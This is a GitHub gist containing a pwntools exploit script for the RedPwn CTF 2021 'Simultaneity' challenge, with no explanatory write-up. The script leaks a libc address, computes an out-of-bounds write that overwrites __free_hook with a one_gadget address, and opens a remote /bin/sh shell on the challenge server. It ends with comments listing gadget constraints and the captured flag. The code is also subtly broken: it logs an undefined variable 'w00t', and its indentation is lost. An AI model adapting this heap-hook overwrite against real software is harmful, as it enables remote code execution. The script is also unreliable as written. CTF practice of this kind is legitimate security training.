Skip to content

Instantly share code, notes, and snippets.

@ikerl
Created Jul 21, 2021
Embed
What would you like to do?
RedPwn CTF 2021 - Simultaneity
from pwn import *
LOCAL = False
if LOCAL:
io = process("./simultaneity")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
"""pid = gdb.attach(io, gdbscript='''
b puts
b _exit
''')"""
else:
io = remote("mc.ax",31547)
libc = ELF("libc.so.6")
io.recvline()
io.sendline("274432")
leak = int(io.recvline().decode().split(" ")[-1].replace("0x",""),16)
log.info("Leak: {}".format(hex(leak)))
io.recvline()
offset_libc = 0x44000
log.info("Libc address: {}".format(hex(leak+0x44000-0x10)))
libc.address = leak+0x44000-0x10
__free_hook_addr = libc.symbols["__free_hook"]
__malloc_hook_addr = libc.symbols["__malloc_hook"]
log.info("__free_hook_addr: {}".format(hex(__free_hook_addr)))
log.info("__malloc_hook_addr: {}".format(hex(__malloc_hook_addr)))
log.info("puts: {}".format(hex(libc.symbols["puts"])))
size = int(int(__free_hook_addr - leak)/8)
ptr_overwrite = leak + size*8
log.info("Address to overwrite: {}".format(hex(ptr_overwrite)))
one_gadget = libc.address+0x448a3
log.info("One_gadget address: {}".format(hex(w00t)))
io.sendline(str(size))
io.recvline()
io.sendline(b"0"*50000+str(one_gadget).encode())
io.interactive()
# REMOTE
"""
0x4484f execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x448a3 execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xe5456 execve("/bin/sh", rsp+0x60, environ)
constraints:
[rsp+0x60] == NULL
"""
# flag{sc4nf_i3_4_h34p_ch4l13ng3_TKRs8b1DRlN1hoLJ}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment